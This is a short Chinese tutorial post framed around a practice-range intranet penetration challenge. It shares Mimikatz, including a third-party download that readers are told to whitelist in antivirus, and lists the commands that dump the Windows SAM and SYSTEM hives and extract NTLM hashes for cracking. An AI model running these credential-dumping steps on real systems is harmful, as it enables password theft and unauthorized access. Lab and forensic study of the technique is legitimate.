前言:最近在某在线靶场遇到的一个内网渗透(注1)的入门基础题,正好搜到了一个比较便捷的获取小工具分享给大家,以便后面遇到类似的问题可以快速解决。
注1:从取证角度讲,内网渗透就是拿到某个疑似违法企业、个人PC的内网权限,然后从内网得到最有价值的线索。
本次用到的工具 Mimikatz
已编译版:https://pan.baidu.com/s/1uiQsNsEQlsvFkluXArvkjA?pwd=3gqw(请设置白名单)
未编译版:https://github.com/gentilkiwi/mimikatz
工具踩坑记录
1、报错:ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
目前报这个错误可能是系统版本太高,工具不支持,暂未找到解决方法。
2、报错:error kuh1_m_sekurlsa_acquireLSA:logon list
遇到这个报错,是 Mimikatz 版本太低,可以到百度找最新版下载使用。
软件使用
先生成注册表 sam.hiv 和 sam.hiv 文件;
//导出sam.hiv和sam.hiv文件(CMD运行)
reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv
通过 Mimikatz 加载 sam.hiv 和 sam.hiv 来导出 Hash;
mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> pwd.txt
得到一串 Hash NTLM,在到解密网站进行密码破解;